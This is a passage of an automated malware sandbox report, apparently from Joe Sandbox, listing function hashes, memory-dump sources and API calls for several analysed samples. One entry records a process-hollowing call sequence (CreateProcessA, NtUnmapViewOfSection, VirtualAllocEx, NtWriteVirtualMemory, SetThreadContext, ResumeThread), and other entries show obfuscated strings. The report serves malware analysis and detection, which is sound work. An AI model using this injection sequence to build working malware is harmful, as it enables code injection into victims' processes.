Opcode Fuzzy Hash: 7c378ba476713a57ce690ade70340cbfcc881fbf62f6a27d0beea7e28777d3c2
Instruction Fuzzy Hash: 61F0E9363002159BC704A67DF40165A37EBFFDA699B14446EE705C7344EF61DC06C791

Uniqueness

Uniqueness Score: -1.00%

Function 097E369F Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61562b049528f12ffe4316183960dcd5064b01af4a22f62e3e463614a997542
Instruction ID: a89f242827bd8e953a039dfff476627e490eb6355fbb4829d5ab6c28e137d2f9
Opcode Fuzzy Hash: a61562b049528f12ffe4316183960dcd5064b01af4a22f62e3e463614a997542
Instruction Fuzzy Hash: 1F01E53054024ACFCF01DFAAEA40A89BBB5FF81355B1097E9D6059732DD7359D49CB80

Uniqueness

Uniqueness Score: -1.00%

Function 097EF970 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56947671304e9b1e85fa8771a928b38e584f127a11f6aa4b85e51a71b625743
Instruction ID: 603d76dea26597bef20bd4a7efdf0d03691936526489bd2d5185be8c93645c4a
Opcode Fuzzy Hash: b56947671304e9b1e85fa8771a928b38e584f127a11f6aa4b85e51a71b625743
Instruction Fuzzy Hash: D2F04474E08249AFCB41DFB8D8415EEBFB0EB8A310F04A5AAD4A4E3210D7700A41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 097E5E21 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de6d895bbd90384ad828ea1de53886cba6daeb8bfc7dc62c07777c27a145dfd6
Instruction ID: a99f48e8fdfedae4ff6e927eef23fe36d89f6bfc5ab6672a87b118ee08772e9b
Opcode Fuzzy Hash: de6d895bbd90384ad828ea1de53886cba6daeb8bfc7dc62c07777c27a145dfd6
Instruction Fuzzy Hash: 22F0273250A748CFDB254F229844253BBA4EF4BFBCF5802AFF48A4A061C671A485D716

Uniqueness

Uniqueness Score: -1.00%

Function 097E36B0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 784a330260e76856136c3f0ef4147d98e9d4b2e126f22e054ca40f7820563534
Instruction ID: 996f67e0c1151cc3147e59a58cead11d70c889dd94cf410c8fead6b61e9bd35c
Opcode Fuzzy Hash: 784a330260e76856136c3f0ef4147d98e9d4b2e126f22e054ca40f7820563534
Instruction Fuzzy Hash: B201E13054020ACFCF01DFAAFA40949BBB5FB40356B1097A4D7048732DDB79AE89CB91

Uniqueness

Uniqueness Score: -1.00%

Function 097E5D30 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f97ed43119e766a123abe8c23d6486b1e78fec7e6387ebf1cd775594094e72fa
Instruction ID: 6356a4b4cc2ae5d0d41adbf9fcc9a7c25a75cd83817cd973c92da0df4bb3f153
Opcode Fuzzy Hash: f97ed43119e766a123abe8c23d6486b1e78fec7e6387ebf1cd775594094e72fa
Instruction Fuzzy Hash: 61F058B1A012158FC780EFBC95056AABBB1EF49214B2041ADE69ADB320E7324A008F81

Uniqueness

Uniqueness Score: -1.00%

Function 097E6B10 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 422944c7215e042e44ca7b50a403018b255bb800b2da2e07c874ffd634192586
Instruction ID: 97b1d196fa22fb60e0af4b2ef123590c077b87804fe3acca804c892e6e86a07b
Opcode Fuzzy Hash: 422944c7215e042e44ca7b50a403018b255bb800b2da2e07c874ffd634192586
Instruction Fuzzy Hash: 3DF0A0356016089FDB10DB6CE040B5F7BFAEB88251F104459E60DC7348DF71AC41CB80

Uniqueness

Uniqueness Score: -1.00%

Function 097E0A57 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b55f97954a697cde2e071f77bf2f8e53b4ba8afd452d92283cf512b76e127efc
Instruction ID: 46b9c4d0227c4fc3a98b9027f8222506fdf2e6fe58d4beea4bbf2910cf71e4b3
Opcode Fuzzy Hash: b55f97954a697cde2e071f77bf2f8e53b4ba8afd452d92283cf512b76e127efc
Instruction Fuzzy Hash: 86F0A932E04259AF8B64CF79A8419EEBBF1FE88351B1084BAD56AD3200F370A601CF50

Uniqueness

Uniqueness Score: -1.00%

Function 097E83F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00eab3800bab58daab89bd958491cd7343b47c7d72dffaed1c886945e35fff93
Instruction ID: 450912cd0f827d1c2e08a9578b872c8594036ea2ad640c3796f197a897abf233
Opcode Fuzzy Hash: 00eab3800bab58daab89bd958491cd7343b47c7d72dffaed1c886945e35fff93
Instruction Fuzzy Hash: 70E092347593484FD7164A2465203A92E598F5B344F0204DEE905DB3A5CB658C0687B2

Uniqueness

Uniqueness Score: -1.00%

Function 097EF980 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af2583251097788bb0c73c4940ace1331783120b813d519f510a9bc31494e7d4
Instruction ID: a79c810cbc66b54ddc42a45db50b8453fc753ba13f2077d22c75d70997714ed5
Opcode Fuzzy Hash: af2583251097788bb0c73c4940ace1331783120b813d519f510a9bc31494e7d4
Instruction Fuzzy Hash: F7F09279D04209EFCB44DFA9D9459AEBBB4FB49310F1095AAE868A3310EB705A40CB84

Uniqueness

Uniqueness Score: -1.00%

Function 097E9948 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fc4f78e14ce0ad028e7968dcc67d2080874008888a82bc967353bf3c197996
Instruction ID: 92b62586589e4ed96d960147f3c64b30bf8a05c9cb3193cd525e0bf468bd1c85
Opcode Fuzzy Hash: e8fc4f78e14ce0ad028e7968dcc67d2080874008888a82bc967353bf3c197996
Instruction Fuzzy Hash: 64E0D8726493484FCB23772894017A9AE9A8FDE304F1514CEEE04CF395DA6A8C46C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 097E6B18 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8801ea130b9b5f2e0f036f49d8ff6750c30217cb9bc3e3b4fa13eb933731d6ff
Instruction ID: e0c6511475c33791c1e8ad981a6b83d9cd12f7a08c4c4470a44823c06c2c69fe
Opcode Fuzzy Hash: 8801ea130b9b5f2e0f036f49d8ff6750c30217cb9bc3e3b4fa13eb933731d6ff
Instruction Fuzzy Hash: E1E06D356001189FDB10DA99E441A9F7BFAEB88661F004059E60EC3248DF74AC408784

Uniqueness

Uniqueness Score: -1.00%

Function 097E5D40 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22527d3baa4be79a21a7c4f0b58cdbb6ac5649eccd2aabe83a27ed6ac7df4b96
Instruction ID: dbfa009d8c66d038c65e1247e52d829bea18ce1bd767014a53de75b0007bb3bb
Opcode Fuzzy Hash: 22527d3baa4be79a21a7c4f0b58cdbb6ac5649eccd2aabe83a27ed6ac7df4b96
Instruction Fuzzy Hash: 18E012B1E001199FCB40EFBCD50469EB7F4EF4C254F114069E619D7310EB309A008BD1

Uniqueness

Uniqueness Score: -1.00%

Function 097E9B90 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99445d59bf5903e385b226fe0597736f2edd8259766cc56a9184d19fd247c2d
Instruction ID: fe9ac7667d230fd470e6014ad5be317537cb776ec8bde93987fca67f661c179c
Opcode Fuzzy Hash: d99445d59bf5903e385b226fe0597736f2edd8259766cc56a9184d19fd247c2d
Instruction Fuzzy Hash: 77E08C32A4A3488FC347873089522523B71AF46208B3005DA8B01CA2AAF726980ACFD6

Uniqueness

Uniqueness Score: -1.00%

Function 097E3741 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8020b8ef651347e1e66de1ac6744cc35198104f472268e71291867eca18e803d
Instruction ID: 79c5469f9426b889ec5d796742d4bc6d8bc0e34d330d8b6a01a7f684a75aed57
Opcode Fuzzy Hash: 8020b8ef651347e1e66de1ac6744cc35198104f472268e71291867eca18e803d
Instruction Fuzzy Hash: 11E08C317081555FDB1A96A8A0106EA7392EFC4314F05407AE304CB294DE684C46C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 097E85D8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8585b9aa2b191ec8bfac64760b2dc97aa8c521d152605bfd75cf53e3c9d21b91
Instruction ID: 23b7bda125048bb914f4d6967d30cb815181cd95b9577fd04dbbbb6446344e43
Opcode Fuzzy Hash: 8585b9aa2b191ec8bfac64760b2dc97aa8c521d152605bfd75cf53e3c9d21b91
Instruction Fuzzy Hash: D1D012366443182F5745EAAD64509DE7FEFDAC4170F048466D50DE7241EE719A8043DE

Uniqueness

Uniqueness Score: -1.00%

Function 097E1A2C Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d05e2765a174dd24724a2a2d185fc14e8b5bccef5b8cd802a140d04a8b374c2c
Instruction ID: 3a5611ce3ebb670dd48a2c1ab3824f6fe3e55408a0dd1ccf62d18eb98ea6ead3
Opcode Fuzzy Hash: d05e2765a174dd24724a2a2d185fc14e8b5bccef5b8cd802a140d04a8b374c2c
Instruction Fuzzy Hash: A5D0235290D1E553DB16012654035392445CEF3344F8200CBE541CA3E5D115C105D7D1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 097E3360 Relevance: 15.1, Strings: 12, Instructions: 140COMMON

Download Yara Rule

Strings

`Q^q, xrefs: 097E3373
`Q^q, xrefs: 097E34F0
`Q^q, xrefs: 097E349A
`Q^q, xrefs: 097E351C
`Q^q, xrefs: 097E3548
`Q^q, xrefs: 097E34C4
`Q^q, xrefs: 097E3442
`Q^q, xrefs: 097E346E
`Q^q, xrefs: 097E339A
`Q^q, xrefs: 097E33EE
`Q^q, xrefs: 097E3418
`Q^q, xrefs: 097E33C4

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: `Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q
API String ID: 0-2561617282
Opcode ID: 95777bbb60f61afa0f126bc6cdabe0caa82327e09df7abb09a7c8bfaf384ee32
Instruction ID: 91cd026075666bfc758c5af2da7b1ff71b2a07eba9d393e928b0fe20c5a6a084
Opcode Fuzzy Hash: 95777bbb60f61afa0f126bc6cdabe0caa82327e09df7abb09a7c8bfaf384ee32
Instruction Fuzzy Hash: 7F516170E1020E9FDB09EFA5E851BAEB7B2FB80704F10492DD6006F398DB756D098B95

Uniqueness

Uniqueness Score: -1.00%

Function 097E3350 Relevance: 15.1, Strings: 12, Instructions: 140COMMON

Download Yara Rule

Strings

`Q^q, xrefs: 097E3373
`Q^q, xrefs: 097E34F0
`Q^q, xrefs: 097E349A
`Q^q, xrefs: 097E351C
`Q^q, xrefs: 097E3548
`Q^q, xrefs: 097E34C4
`Q^q, xrefs: 097E3442
`Q^q, xrefs: 097E346E
`Q^q, xrefs: 097E339A
`Q^q, xrefs: 097E33EE
`Q^q, xrefs: 097E3418
`Q^q, xrefs: 097E33C4

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: `Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q$`Q^q
API String ID: 0-2561617282
Opcode ID: 0a4d095b80a414066805fb636d42cd34af12f98c4a6c983747d04460b9a86817
Instruction ID: 18bc52988d06a2f66e2d66a0c80aa7b6b46818ac9c0fbbc38ea209fcdcb97676
Opcode Fuzzy Hash: 0a4d095b80a414066805fb636d42cd34af12f98c4a6c983747d04460b9a86817
Instruction Fuzzy Hash: 33515270E5020E9FDB09EFA4E951BAEB7B2FB80704F10492DD6006F398DB756D098B95

Uniqueness

Uniqueness Score: -1.00%

Function 097E9C00 Relevance: 9.2, Strings: 7, Instructions: 467COMMON

Download Yara Rule

Strings

$^q, xrefs: 097E9D39
$^q, xrefs: 097E9CE3
$^q, xrefs: 097E9D8F
$^q, xrefs: 097EA0C3
(_^q, xrefs: 097E9E5B
(_^q, xrefs: 097E9E41
$^q, xrefs: 097E9F2F

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2667574237
Opcode ID: 99cb78019e1d41458fceb34c28681e80e37d86b20a84b36abef671d818d9acf1
Instruction ID: 0631026eac6468da810ed956b7a5fd29fe2182aa588d5f221355b365fde43ca8
Opcode Fuzzy Hash: 99cb78019e1d41458fceb34c28681e80e37d86b20a84b36abef671d818d9acf1
Instruction Fuzzy Hash: 89224A70A002099FDB14EFA5D840B9DBBB2FF89301F2085ADD519AB368DB35AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 097E9C08 Relevance: 9.2, Strings: 7, Instructions: 464COMMON

Download Yara Rule

Strings

$^q, xrefs: 097E9D39
$^q, xrefs: 097E9CE3
$^q, xrefs: 097E9D8F
$^q, xrefs: 097EA0C3
(_^q, xrefs: 097E9E5B
(_^q, xrefs: 097E9E41
$^q, xrefs: 097E9F2F

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: (_^q$(_^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2667574237
Opcode ID: ec26e6a5c5ef2283acf1f179306477773618ae1ce7a08287f511769fe5d2c278
Instruction ID: 7cee266a7f11b8322b61f175910f9579de2170f27ef1e597ef3a986223c18593
Opcode Fuzzy Hash: ec26e6a5c5ef2283acf1f179306477773618ae1ce7a08287f511769fe5d2c278
Instruction Fuzzy Hash: 86224A70A402099FDB14EFA5D840B9DBBB2FF89301F2085ADD509AB368DB35AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 097E9419 Relevance: 6.5, Strings: 5, Instructions: 277COMMON

Download Yara Rule

Strings

$^q, xrefs: 097E9573
(_^q, xrefs: 097E9507
(_^q, xrefs: 097E94ED
$^q, xrefs: 097E9496
$^q, xrefs: 097E973C

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: (_^q$(_^q$$^q$$^q$$^q
API String ID: 0-142850551
Opcode ID: d47bce3ea72b94b8e2fd51e5d4845aaabf97c1b34a02f54d7fa80050cd38d000
Instruction ID: 6e8e034c608a9860290a4089cddeb38325fcb1f0b9cf4adb4e4cf97987d5e778
Opcode Fuzzy Hash: d47bce3ea72b94b8e2fd51e5d4845aaabf97c1b34a02f54d7fa80050cd38d000
Instruction Fuzzy Hash: ADC160709402099FDB05DFA9D950E9DBBB2FF88300F1084ADD2116B368DB76AD45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 097E9428 Relevance: 6.5, Strings: 5, Instructions: 273COMMON

Download Yara Rule

Strings

$^q, xrefs: 097E9573
(_^q, xrefs: 097E9507
(_^q, xrefs: 097E94ED
$^q, xrefs: 097E9496
$^q, xrefs: 097E973C

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: (_^q$(_^q$$^q$$^q$$^q
API String ID: 0-142850551
Opcode ID: a00c933f9f4fa42bf1dce154023e28e68504e90ee61295c6617cab47e50394ca
Instruction ID: bfe67f4ff15fd139d0b14e1836b7ed462e71e030b73b0250cef93bec189bbdb2
Opcode Fuzzy Hash: a00c933f9f4fa42bf1dce154023e28e68504e90ee61295c6617cab47e50394ca
Instruction Fuzzy Hash: 9EC14070A402099FCB09DFA9D950E9DBBB2FF88300F1084A9D2116B368DB76AD45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 097EC7D8 Relevance: 5.1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

Strings

(bq, xrefs: 097EC8CE
(bq, xrefs: 097EC8FA
@3A, xrefs: 097EC82E
\*A, xrefs: 097EC89E

Memory Dump Source

Source File: 0000000A.00000002.2435267968.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_97e0000_4A1B.jbxd

Similarity

API ID:
String ID: (bq$(bq$@3A$\*A
API String ID: 0-1078144681
Opcode ID: b05c91e0a33ede9d820496995b7cc43d180e45bd15914234921ab28860f4f494
Instruction ID: 0ebaa70931ccf043ef12e256d75783e7b369592c08af6648aa069dd84c9a584d
Opcode Fuzzy Hash: b05c91e0a33ede9d820496995b7cc43d180e45bd15914234921ab28860f4f494
Instruction Fuzzy Hash: EE31D036B412154FC709AEBEA98045E7BD7EBC4250314857ED61ACB398EE71CC0687D4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 50E3.exePID: 6308, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	42.6%
Dynamic/Decrypted Code Coverage:	86.4%
Signature Coverage:	0%
Total number of Nodes:	44
Total number of Limit Nodes:	8

Executed Functions

Function 02A50110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02A50156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 02A5016C
CreateProcessA.KERNELBASE(?,00000000), ref: 02A50255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02A50270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A50283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 02A5029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02A502C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 02A502E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02A50304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 02A5032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02A50399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 02A503BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 02A503E1
ResumeThread.KERNELBASE(00000000), ref: 02A503ED
ExitProcess.KERNEL32(00000000), ref: 02A50412

Memory Dump Source

Source File: 0000000B.00000002.2285886950.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2a50000_50E3.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 93872480-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: a53644b190b6d2e3dc958687c369a4cfa2b59076f138080457bf9699f2736d87
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 95B1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D771AD41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02A50420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 02A50533

Strings

mfoaskdfnoa, xrefs: 02A50520, 02A50523
d, xrefs: 02A50584
0, xrefs: 02A50492
saodkfnosa9uin, xrefs: 02A504DA

Memory Dump Source

Source File: 0000000B.00000002.2285886950.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2a50000_50E3.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 72990bd85025dc2610131e3c96d02c0490f356a24faa825590877efd3b5b4491
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 5D512A70D08388DEEB11CBE8C849BDEBFB2AF15708F144058D9447F286C7BA5658CB66

Uniqueness

Uniqueness Score: -1.00%

Function 02A505B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 02A505EC

Strings

o, xrefs: 02A50600
apfHQ, xrefs: 02A505E2, 02A505E5

Memory Dump Source

Source File: 0000000B.00000002.2285886950.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2a50000_50E3.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 465a127f3c9a5d8eeb10c97e9db16278e1e4ecacd34387f14362454f094d2204
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: BF012170C0425CEEDF10DF98C5583AEBFB5AF55308F1480D9C8092B241D7B69B58CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0288F7C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0288F7EE
Module32First.KERNEL32(00000000,00000224), ref: 0288F80E

Memory Dump Source

Source File: 0000000B.00000002.2285416255.000000000288F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0288F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_288f000_50E3.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: a559aa5c93e86481ce329d45cf43c2d55dda95232e2c19623221006e94bb47cb
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 05F09C3D1007116FE7203BF5A88DB6E76E8FF99725F500529E746D14C0D770E8454A51

Uniqueness

Uniqueness Score: -1.00%

Function 0288F485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0288F4D6

Memory Dump Source

Source File: 0000000B.00000002.2285416255.000000000288F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0288F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_288f000_50E3.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 1043904119b50af0e0c3b16b2fb10ff2b3e34f907cbf7354506a919656f3337c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 51113C79A00208EFDB01DF98C985E99BBF5AF08350F558094FA489B361D775EA90DF90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 6736, Parent PID: 6596COMMON

Execution Graph

Execution Coverage:	24.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	50
Total number of Limit Nodes:	8

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 045447E4 Relevance: 4.9, APIs: 3, Instructions: 448
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,000003F4,?,?,00000001,?,000000FF,00000001), ref: 04544C33
VirtualProtect.KERNELBASE(?,?,00000002,?), ref: 04544C71
VirtualProtect.KERNELBASE(?,?,00000000,?), ref: 04544CFC

Memory Dump Source

